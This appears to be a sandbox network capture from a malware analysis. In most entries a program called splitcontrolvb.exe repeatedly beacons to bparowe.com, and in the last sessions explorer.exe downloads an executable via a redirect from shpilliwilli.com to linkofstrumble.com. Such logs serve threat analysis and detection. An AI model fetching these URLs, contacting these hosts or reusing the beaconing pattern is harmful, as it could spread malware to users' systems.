                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 7=[0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                298192.168.2.459529185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:54.646152020 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:54.919943094 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:54 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                299192.168.2.459530185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:55.341481924 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:55.619837999 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:55 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                300192.168.2.459531185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:56.043154955 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:56.324177980 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:56 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                301192.168.2.459532185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:56.722661018 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:56.996273041 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:56 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                302192.168.2.459533185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:57.435691118 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:57.715265989 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:57 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                303192.168.2.459534185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:58.175554037 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:58.453186035 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:58 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                304192.168.2.459535185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:58.905672073 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:59.185219049 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:59 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                305192.168.2.459536185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:59.613099098 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:59.886630058 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:59 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                306192.168.2.459537185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:06:00.365055084 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:06:00.645262003 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:06:00 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                307192.168.2.459538185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:06:01.136131048 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:06:01.419492960 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:06:01 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                308192.168.2.459539185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:06:01.897285938 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:06:02.178620100 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:06:02 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                309192.168.2.459540185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:06:02.587476969 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:06:02.860852957 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:06:02 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                310192.168.2.459541185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:06:03.276740074 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:06:03.556251049 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:06:03 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                311192.168.2.459542185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:06:04.017857075 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:06:04.296298981 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:06:04 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                0192.168.2.449753104.21.45.1424432580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:02:46 UTC190OUTGET /288c47bbc1871b439df19ff4df68f076.exe HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                Host: shpilliwilli.com
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:02:47 UTC696INHTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:02:47 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Location: https://linkofstrumble.com/fe59b57390b3eb9c78ef311810f298a4/288c47bbc1871b439df19ff4df68f076.exe
                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LjT8Yg1gSP0mnIaLO3gztgT7%2FOpnqXkkEhMmEVMJfUFLDmgd8e9Gw30sr3RwZWJkrGFT5KeYnE1kpChj1XcdHPMJcA%2BdXxycwBGv40xY9UMq1DSV4QE%2BZLCTwupVtYMChy5J"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                CF-RAY: 838d3b426bfa31d7-MIA
                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:02:47 UTC138INData Raw: 38 34 0d 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6c 69 6e 6b 6f 66 73 74 72 75 6d 62 6c 65 2e 63 6f 6d 2f 66 65 35 39 62 35 37 33 39 30 62 33 65 62 39 63 37 38 65 66 33 31 31 38 31 30 66 32 39 38 61 34 2f 32 38 38 63 34 37 62 62 63 31 38 37 31 62 34 33 39 64 66 31 39 66 66 34 64 66 36 38 66 30 37 36 2e 65 78 65 22 3e 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 61 3e 2e 0a 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 84<a href="https://linkofstrumble.com/fe59b57390b3eb9c78ef311810f298a4/288c47bbc1871b439df19ff4df68f076.exe">Temporary Redirect</a>.
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:02:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                1192.168.2.449754104.21.88.1494432580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:02:47 UTC225OUTGET /fe59b57390b3eb9c78ef311810f298a4/288c47bbc1871b439df19ff4df68f076.exe HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                Host: linkofstrumble.com
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:02:48 UTC679INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:02:48 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-ms-dos-executable
                                                                                                                                                                                                                                                                                                                                Content-Length: 4329368
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Last-Modified: Thu, 21 Dec 2023 01:31:54 GMT
                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=14400
                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: MISS
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6na7T8OVOs%2Fbkk0WkWS%2FfEZ%2FSzKZt2f6B5QeXSGoPEXlcvRumvMwTvs418QaYUA%2BXf4KIlUKDzkwKuxV2ObpMXmz8PZDb40MNqdpD1mkM2LqgNGOFJGNcaCBykzSZMZv0K8EDZI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                CF-RAY: 838d3b48aecb220f-MIA
                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
